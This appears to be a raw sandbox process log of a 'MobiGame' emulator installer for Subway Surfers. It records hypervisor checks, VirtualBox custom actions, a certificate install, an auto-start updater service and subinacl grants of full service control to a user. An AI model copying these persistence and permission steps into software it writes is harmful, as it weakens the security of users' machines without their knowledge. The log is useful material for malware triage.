C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4572 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\utils\sysinfo-app.exe"

C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\utils\sysinfo-app.exe

C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\utils\sysinfo-app.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6992 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\MobiHelper.exe

"MobiHelper.exe" --install-path="C:\Program Files\MobiGame" --desktop-path="C:\Users\Admin\Desktop" --local-app-data-path="C:\Users\Admin\AppData\Local\MobiGame" --parent="C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe" --playstore-json-file-path="C:\Users\Admin\AppData\Local\MobiGame\playstore.json" --google-analytics-id="0" --create-app-shortcut --app-id="com.kiloo.subwaysurf" --app-name="Subway Surfers" --app-icon-url="https://play-lh.googleusercontent.com/RxkRzr__LkRttN1r5Zfh2BMzaG7NKf7iL8yj8f1TKIfwNSuRn29zxGh4b1vbEmsNJjPJ"

C:\Windows\system32\ie4uinit.exe

"C:\Windows\system32\ie4uinit.exe" -show

C:\Windows\system32\ie4uinit.exe

"C:\Windows\system32\ie4uinit.exe" -show

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_OptionalFeature | Where-Object {('HypervisorPlatform','VirtualMachinePlatform','Microsoft-Hyper-V-All','Microsoft-Hyper-V-Hypervisor','Microsoft-Hyper-V-Services') -like $_.Name}).InstallState

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=8348 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3112 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 881FB09450E5B681BB59DC1B0EF5C8BA

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI7E19.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240877156 574 WixSharp!WixSharp.ManagedProjectActions.WixSharp_InitRuntime_Action

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI80CA.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240877796 583 WixSharp!WixSharp.ManagedProjectActions.WixSharp_Load_Action

C:\Windows\system32\cmd.exe

"cmd.exe" /c set

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI86F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240879359 604 VirtualBoxSetup!VirtualBoxSetup.CustomActions.SetSessionPropertiesFromConfig

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7076 /prefetch:1

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding D6F65FD4A1A3940EF3150FDD1AE7B70E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1772 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7640 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 177442438E24C2611F16A5418A7CB8ED E Global\MSI0000

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIDF7B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240902156 655 VirtualBoxSetup!VirtualBoxSetup.CustomActions.CloseProcessesAndUsedFiles

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIE26A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240902796 662 VirtualBoxSetup!VirtualBoxSetup.CustomActions.DeletePlayStoreAutorun

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7044 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4976 /prefetch:2

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI6E40.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240938687 666 VirtualBoxSetup!VirtualBoxSetup.CustomActions.CreatePlaystore

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI744C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240940062 671 VirtualBoxSetup!VirtualBoxSetup.CustomActions.CreateRegistryForAegLauncher

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI76CE.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240940781 675 VirtualBoxSetup!VirtualBoxSetup.CustomActions.InstallCertificate

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI79EC.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240941515 679 VirtualBoxSetup!VirtualBoxSetup.CustomActions.SaveSessionPropertiesToConfig

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI7E71.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240942687 689 VirtualBoxSetup!VirtualBoxSetup.CustomActions.SubstitutePath

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI849C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240944234 709 VirtualBoxSetup!VirtualBoxSetup.CustomActions.InstallService

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" "C:\Program Files\MobiGame\MobiGameUpdater.exe"

C:\Windows\system32\sc.exe

"sc.exe" config MobiGameUpdater start= auto

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\MobiGame\utils\subinacl.exe

"C:\Program Files\MobiGame\utils\subinacl.exe" /service MobiGameUpdater /grant=S-1-5-21-177160434-2093019976-369403398-1000=F

C:\Program Files\MobiGame\MobiGameUpdater.exe

"C:\Program Files\MobiGame\MobiGameUpdater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI9844.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240949296 722 VirtualBoxSetup!VirtualBoxSetup.CustomActions.InstallAegLauncherService

C:\Program Files\MobiGame\aeg_launcher.exe

"C:\Program Files\MobiGame\aeg_launcher.exe" -service=install

C:\Windows\system32\sc.exe

"sc.exe" config AegLauncher start= demand

C:\Program Files\MobiGame\utils\subinacl.exe

"C:\Program Files\MobiGame\utils\subinacl.exe" /service AegLauncher /grant=S-1-5-21-177160434-2093019976-369403398-1000=F

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIA68D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240953000 735 VirtualBoxSetup!VirtualBoxSetup.CustomActions.UpdateUninstallData

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 76CDA50BA93AFAFD0AB6A1C65F926586 E Global\MSI0000

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIAE7F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240955015 744 VirtualBoxSetup!VirtualBoxSetup.CustomActions.RegisterCustomProtocol

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIBD17.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240959218 753 VirtualBoxSetup!VirtualBoxSetup.CustomActions.InstallVirtualBox

C:\Windows\system32\cmd.exe

"cmd.exe" /c "C:\Program Files\MobiGame\player\register_services.cmd"

C:\Windows\system32\net.exe

NET FILE

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 FILE

C:\Windows\syswow64\regsvr32.exe

C:\Windows\syswow64\regsvr32 /s /u "C:\Program Files\MobiGame\player\x86\VBoxClient-x86.dll"

C:\Windows\system32\regsvr32.exe

C:\Windows\system32\regsvr32 /s /u "C:\Program Files\MobiGame\player\VBoxC.dll"

C:\Program Files\MobiGame\player\MobiVBoxSVC.exe

"C:\Program Files\MobiGame\player\MobiVBoxSVC.exe" /RegServer

C:\Windows\system32\regsvr32.exe

C:\Windows\system32\regsvr32 /s "C:\Program Files\MobiGame\player\VBoxC.dll"

C:\Windows\syswow64\regsvr32.exe

C:\Windows\syswow64\regsvr32 /s "C:\Program Files\MobiGame\player\x86\VBoxClient-x86.dll"

C:\Program Files\MobiGame\player\SUPInstall.exe

"C:\Program Files\MobiGame\player\\SUPInstall.exe"

C:\Windows\system32\net.exe

NET FILE

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 FILE

C:\Windows\syswow64\regsvr32.exe

C:\Windows\syswow64\regsvr32 /s /u "C:\Program Files\MobiGame\player\x86\VBoxClient-x86.dll"

C:\Windows\system32\regsvr32.exe

C:\Windows\system32\regsvr32 /s /u "C:\Program Files\MobiGame\player\VBoxC.dll"

C:\Program Files\MobiGame\player\MobiVBoxSVC.exe

"C:\Program Files\MobiGame\player\MobiVBoxSVC.exe" /UnregServer

C:\Program Files\MobiGame\player\NetLwfUninstall.exe

"C:\Program Files\MobiGame\player\\NetLwfUninstall.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc

C:\Program Files\MobiGame\player\USBUninstall.exe

"C:\Program Files\MobiGame\player\\USBUninstall.exe"

C:\Program Files\MobiGame\player\SUPUninstall.exe

"C:\Program Files\MobiGame\player\\SUPUninstall.exe"

C:\Windows\system32\sc.exe

"C:\Windows\system32\sc.exe" stop "MobiGameUpdater"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /u "C:\Program Files\MobiGame\MobiGameUpdater.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIF129.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240972031 767 VirtualBoxSetup!VirtualBoxSetup.CustomActions.RemoveRegistryForAegLauncher

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7904 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8580 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7928 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8436 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8620 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8604 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8996 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3020 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

